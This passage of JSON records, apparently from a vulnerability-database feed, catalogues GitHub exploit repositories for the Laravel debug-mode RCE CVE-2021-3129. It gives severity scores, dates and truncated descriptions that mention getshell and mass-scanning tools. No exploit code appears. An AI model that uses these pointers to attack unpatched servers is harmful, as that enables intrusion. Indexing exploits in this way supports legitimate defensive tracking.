"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-08-11T15:20:45", "description": "# laravel-CVE-2021-3129-EXP\n\nCVE-2021-312...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-25T08:42:28", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-11T07:46:44", "id": "015776ED-F570-51F6-BD7B-6A422942FCBB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-21T12:48:02", "description": "# Laravel_CVE-2021-3129_EXP\n\u53c2\u8003exp: https://github.com/SNC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-27T05:44:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-07-21T09:16:22", "id": "FE9CDF3B-2AEE-5EA8-8B5B-5210E82BF169", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-25T12:53:19", "description": "# Laravel-debug-Checker\n\n![Laravel](https://img.shields.io/badge...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-10T03:32:34", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-09-25T09:52:30", "id": "7495BDC7-BA22-5D7D-92B8-B3FD263480F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-10T06:51:04", "description": "# CVE-2021-3129_exploit\nExploit for CVE-2021-3129\n## Lab setup:\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-27T10:16:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-10T06:02:18", "id": "6E0E7058-958F-5D83-9BC3-AC9A1571D8AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-25T10:33:53", "description": "# CVE-2021-3129\n\n```\n\u751f\u6210\u81ea\u5b9a\u4e49\u547d\u4ee4\u7684phar\u5305\uff1a\nphp -d'phar.readonly=0' ./ph...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T08:53:05", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-08-25T05:04:36", "id": "02C11241-781D-5142-A562-1315AFB6C819", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-09T11:17:44", "description": "# CVE-2021-3129\nLaravel &lt;= v8.4.2 debug mode: Remote code exe...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-08T06:34:17", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-09-09T04:21:08", "id": "4EE21D54-330E-5291-B612-7D80CD427AB7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-16T16:46:45", "description": "# CVE-2021-3129\nLaravel &lt;= v8.4.2 debug mode: Remote code exe...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-18T05:42:13", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-16T07:16:17", "id": "AF827A23-A60A-565F-B2B6-E5038132A33A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:13:52", "description": "### \u4e3b\u8981\u529f\u80fd\n\t\u9488\u5bf9CVE-2021-3129\u6f0f\u6d1e\u8fdb\u884cGetshell\n\n### \u4f7f\u7528\u65b9\u6cd5\n pyt...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-06T14:24:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-11-06T14:27:50", "id": "86E0EEED-C430-5343-BCD1-3FF58D995440", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-06T11:53:45", "description": "# CVE-2021-3129\nLaravel RCE CVE-2021-3129\n\n# \u6f0f\u6d1e\u6982\u8ff0\n\u5f53Laravel\u5f00\u542f\u4e86Deb...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-11T15:31:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-03-11T15:33:24", "id": "7391B704-6E84-5129-A413-83DD4C822DCA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-12T10:44:35", "description": "# CVE-2021-3129\nCVE-2021-3129-Laravel Debug mode \u8fdc\u7a0b\u4ee3\u7801\u6267...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-21T06:27:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-12T03:18:26", "id": "B57BBC1D-AC88-5370-9A63-B487A1331956", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:24:48", "description": "# CVE-2021-3129\nLaravel debug mode - Remote Code Execution (RCE)...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T17:54:17", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-09-30T21:03:46", "id": "0EF9F6DB-42EC-5183-B85C-571CD1B0D72B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:25:52", "description": "# Laravel-CVE-2021-3129\nCVE-2021-3129\n\n\n\n## \u63cf\u8ff0\n\n\u6574\u5408https://githu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:58:47", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-04-21T05:37:04", "id": "B38F4879-DCB8-54AF-B9CE-CE64AF007EB8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:27", "description": "# CVE-2021-3129\nPoC for CVE-2021-3129 (Laravel)\n\nFor educational...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-01T09:09:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-09-16T21:47:53", "id": "272FC334-4DD4-570F-AB53-1BF7758BA869", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-10T15:49:15", "description": "# CVE-2021-3129\nLaravel debug rce\n\n# \u98df\u7528\u65b9\u6cd5\n\u6267\u884c`docker-compse up -d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-22T05:12:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-10T11:46:01", "id": "5E9C0870-F853-5E81-8E8C-A056A9C414DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:37:12", "description": "# laravel-exploits\nExploit for CVE-2021-3129\nDetails: https://ww...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T12:52:20", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-08-15T12:34:47", "id": "501BA9BB-F145-529E-BFA9-62A94BCB6191", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-03T03:09:26", "description": "# CVE-2021-3129\nMass Scan Tools For Laravel <= V8.4.2 Debug Mode...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-27T12:14:01", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-09-03T00:29:08", "id": "313C22E5-78EA-5763-8056-C013290F4D31", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-26T11:24:31", "description": "# CVE-2021-3129\nLaravel RCE (CVE-2021-3129)\n\n# Test Environment\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-26T08:05:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-07-26T08:26:35", "id": "4A21781C-BAC4-5A28-A75F-DFA93D7D4D9D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:50:57", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-14T09:24:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-10-24T10:23:11", "id": "472CD5C0-023D-5465-BAD9-83CF49B2139D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:28:28", "description": "# Laravel-CVE-2021-3129\nCVE-2021-3129\n\n\n\n## \u63cf\u8ff0\n\n\u6574\u5408https://githu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:58:47", "type": "githubexploit", "title": "Exploit for Vulnerability in Facade Ignition", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2023-04-21T05:37:04", "id": "DF739DCB-597D-5266-BFD7-DD6EDEB4ABA4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:25:59", "description": "# CVE-2021-3129\nYet another exploit for CVE-2021-3129! Made to h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, 